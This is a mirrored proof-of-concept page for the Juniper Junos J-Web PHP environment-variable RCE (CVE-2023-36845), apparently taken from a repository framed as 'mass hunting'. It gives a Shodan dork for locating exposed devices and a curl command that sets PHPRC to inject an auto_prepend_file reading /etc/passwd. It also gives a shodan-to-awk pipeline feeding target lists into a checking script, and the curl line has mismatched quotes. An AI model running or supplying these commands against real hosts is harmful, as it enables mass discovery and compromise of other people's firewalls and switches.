Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-36845 PoC — Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment

Source
Associated Vulnerability
Title:Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable (CVE-2023-36845)
Description:A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.
Description
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.
Readme
# Juniper-CVE-2023-36845-Mass-Hunting
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

## How to find:

Shodan dork: http.favicon.hash:2141724739

use with relevant other dorks such as ssl certs, org name, etc for a more targetted search.


## Exploitation for a single host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

## Automation: 
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt
![IMAGE](imageedit_1_8650806956.jpg)
File Snapshot

[4.0K] /data/pocs/334b283944e49c4d868c4a00bcd3dca34cbef154 ├── [105K] imageedit_1_8650806956.jpg ├── [1.4K] Juniper-RCE-Check.sh ├── [6.9K] LICENSE └── [ 974] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →